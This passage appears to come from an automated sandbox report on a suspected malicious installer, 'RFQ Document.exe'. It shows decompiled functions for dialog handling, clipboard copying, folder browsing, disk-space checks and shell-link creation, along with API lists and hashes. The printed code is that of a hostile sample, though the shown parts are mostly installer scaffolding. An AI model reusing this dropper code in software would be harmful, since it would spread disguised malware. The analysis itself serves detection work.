				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x764fc8
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404ffa
0x00405000
0x00405009
0x0040500c
0x0040519d
0x004051a4
0x004051c8
0x004051c8
0x004051ce
0x004051db
0x004051f9
0x004051f9
0x00405200
0x00405257
0x00405257
0x0040525b
0x00000000
0x00000000
0x0040525d
0x00405260
0x00000000
0x00000000
0x0040526a
0x00405270
0x00405272
0x00405275
0x0040536e
0x00000000
0x0040536e
0x00405284
0x00405290
0x00405296
0x00405299
0x0040529c
0x004052b1
0x004052b4
0x004052b4
0x004052b7
0x0040529e
0x004052a3
0x004052a9
0x004052ac
0x004052ac
0x004052c7
0x004052cf
0x004052d0
0x004052d2
0x004052db
0x004052de
0x004052e5
0x004052ec
0x004052f4
0x004052f4
0x00405302
0x00405308
0x0040530b
0x0040530b
0x00405312
0x00405318
0x00405321
0x00405328
0x00405331
0x00405333
0x00405336
0x00405345
0x00405347
0x0040534d
0x0040534e
0x0040534f
0x0040534f
0x00405357
0x00405362
0x00405368
0x00405368
0x00000000
0x004052d2
0x00405202
0x00405208
0x00405238
0x0040523a
0x00405240
0x0040524b
0x0040524b
0x00405252
0x00000000
0x00405252
0x0040520c
0x00405216
0x00000000
0x004051dd
0x004051dd
0x004051e3
0x0040521b
0x00000000
0x00405224
0x004051ec
0x004051f1
0x004051f4
0x00000000
0x004051f4
0x004051db
0x00405012
0x00405016
0x0040501f
0x00405026
0x00405029
0x0040502c
0x0040502f
0x00405030
0x00405031
0x0040504a
0x0040504d
0x00405057
0x00405066
0x0040506e
0x00405076
0x0040507b
0x0040507e
0x0040508a
0x00405093
0x0040509c
0x004050bf
0x004050c5
0x004050d6
0x004050db
0x004050e9
0x004050f7
0x004050f7
0x004050fc
0x0040510a
0x0040510a
0x0040510f
0x00405112
0x00405117
0x00405123
0x0040512c
0x00405139
0x00405148
0x0040513b
0x00405140
0x00405140
0x00405154
0x00405154
0x00405168
0x00405171
0x0040517a
0x0040518a
0x00405196
0x00405196
0x00000000

APIs

GetDlgItem.USER32 ref: 00405050
GetDlgItem.USER32 ref: 0040505F
GetClientRect.USER32 ref: 0040509C
GetSystemMetrics.USER32 ref: 004050A4
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
ShowWindow.USER32(?,00000008), ref: 00405140
GetDlgItem.USER32 ref: 00405161
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
GetDlgItem.USER32 ref: 0040506E

Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6

GetDlgItem.USER32 ref: 004051B3
CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
CloseHandle.KERNEL32(00000000), ref: 004051C8
ShowWindow.USER32(00000000), ref: 004051EC
ShowWindow.USER32(00000000,00000008), ref: 004051F1
ShowWindow.USER32(00000008), ref: 00405238
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
CreatePopupMenu.USER32 ref: 0040527B
AppendMenuA.USER32 ref: 00405290
GetWindowRect.USER32 ref: 004052A3
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
OpenClipboard.USER32(00000000), ref: 00405312
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
GlobalLock.KERNEL32 ref: 0040532B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
SetClipboardData.USER32(00000001,00000000), ref: 00405362
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405368

Strings

{, xrefs: 00405257

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004042C1, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42e3fc; // 0x76c0c0
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x764fc8
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004042c1
0x004042c7
0x004042cd
0x004042da
0x004042e8
0x004042eb
0x004042f3
0x004042f9
0x004042f9
0x00404305
0x00404308
0x00404376
0x0040437d
0x00404454
0x0040445b
0x0040446a
0x0040446a
0x0040446e
0x00404478
0x00404485
0x00404487
0x00404487
0x00404495
0x0040449c
0x004044a3
0x004044a6
0x004044dd
0x004044df
0x004044e5
0x004044ea
0x004044ee
0x004044f0
0x004044f0
0x0040450c
0x00000000
0x0040450e
0x00404511
0x0040451f
0x00404525
0x00404526
0x00404529
0x0040452c
0x00000000
0x0040452c
0x004044a8
0x004044aa
0x004044ae
0x00000000
0x00000000
0x00000000
0x00000000
0x004044b0
0x004044b0
0x004044bd
0x004044c2
0x00000000
0x00000000
0x004044c6
0x004044c8
0x004044c8
0x004044d3
0x004044d6
0x004044db
0x00000000
0x00000000
0x00000000
0x00000000
0x004044db
0x00404538
0x00404542
0x00404545
0x00404548
0x0040454f
0x0040454f
0x00404551
0x00404551
0x00404556
0x00404558
0x00404560
0x00404567
0x00404569
0x00404574
0x00404574
0x00404569
0x0040457b
0x00404584
0x0040458e
0x00404596
0x004045b1
0x00404598
0x004045a1
0x004045a1
0x00404596
0x004045b6
0x004045bb
0x004045c0
0x004045c9
0x004045c9
0x004045d2
0x004045d4
0x004045d4
0x004045e0
0x004045e8
0x004045f2
0x004045f2
0x004045f7
0x00000000
0x004045f7
0x004044a6
0x0040445d
0x00404464
0x00000000
0x00000000
0x00000000
0x00404464
0x00404383
0x0040438c
0x004043a6
0x004043ab
0x004043b5
0x004043bc
0x004043c8
0x004043cb
0x004043ce
0x004043d5
0x004043dd
0x004043e0
0x004043e4
0x004043eb
0x004043f3
0x0040444d
0x004043f5
0x004043f6
0x004043fd
0x00404402
0x00404407
0x0040440f
0x0040441c
0x00404430
0x00404434
0x00404434
0x00404430
0x00404439
0x00404446
0x00404446
0x004043f3
0x00000000
0x004043ab
0x00404399
0x00000000
0x00000000
0x0040439f
0x00000000
0x0040430a
0x00404317
0x00404320
0x0040432d
0x0040432d
0x00404334
0x0040433a
0x00404343
0x00404346
0x00404349
0x00404351
0x00404354
0x00404357
0x0040435d
0x00404364
0x0040436b
0x004045fd
0x0040460f
0x00404371
0x00404374
0x00000000
0x00404374
0x0040436b

APIs

GetDlgItem.USER32 ref: 00404310
SetWindowTextA.USER32(00000000,?), ref: 0040433A
SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
CoTaskMemFree.OLE32(00000000), ref: 004043F6
lstrcmpiA.KERNEL32(TclpOwkq,0042A0A0,00000000,?,?), ref: 00404428
lstrcatA.KERNEL32(?,TclpOwkq), ref: 00404434
SetDlgItemTextA.USER32 ref: 00404446

Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F

Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ Document.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\RFQ Document.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3

GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F

Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731

Strings

TclpOwkq, xrefs: 00404422, 00404427, 00404432
A, xrefs: 004043E4
C:\Users\user\AppData\Local\Temp, xrefs: 00404411

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$TclpOwkq
API String ID: 2624150263-2783699494
Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040205c
0x00402066
0x0040206f
0x00402079
0x00402082
0x0040208c
0x00402090
0x00402090
0x00402095
0x004020a6
0x004020ae
0x0040218e
0x0040218e
0x00402195
0x004020b4
0x004020b4
0x004020c5
0x004020c9
0x004020cf
0x004020d9
0x004020db
0x004020e6
0x004020e9
0x004020f6
0x004020f8
0x004020fa
0x00402101
0x00402104
0x00402104
0x00402107
0x00402111
0x00402119
0x0040211e
0x0040212a
0x0040212a
0x0040212d
0x00402136
0x00402139
0x00402142
0x00402147
0x00402159
0x00402168
0x0040216a
0x00402176
0x00402176
0x00402168
0x00402178
0x0040217e
0x0040217e
0x00402181
0x00402187
0x0040218c
0x004021a1
0x00000000
0x00000000
0x00000000
0x0040218c
0x00402197
0x004028c1
0x004028cd

APIs

CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020DE

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405B25(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405BC7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402689
0x0040269d
0x004026a8
0x004026a9
0x004027e4
0x0040268b
0x0040268b
0x0040268d
0x0040268f
0x0040268f
0x004028c1
0x004028cd

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406354, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406354(signed int __ebx, signed int* __esi) {
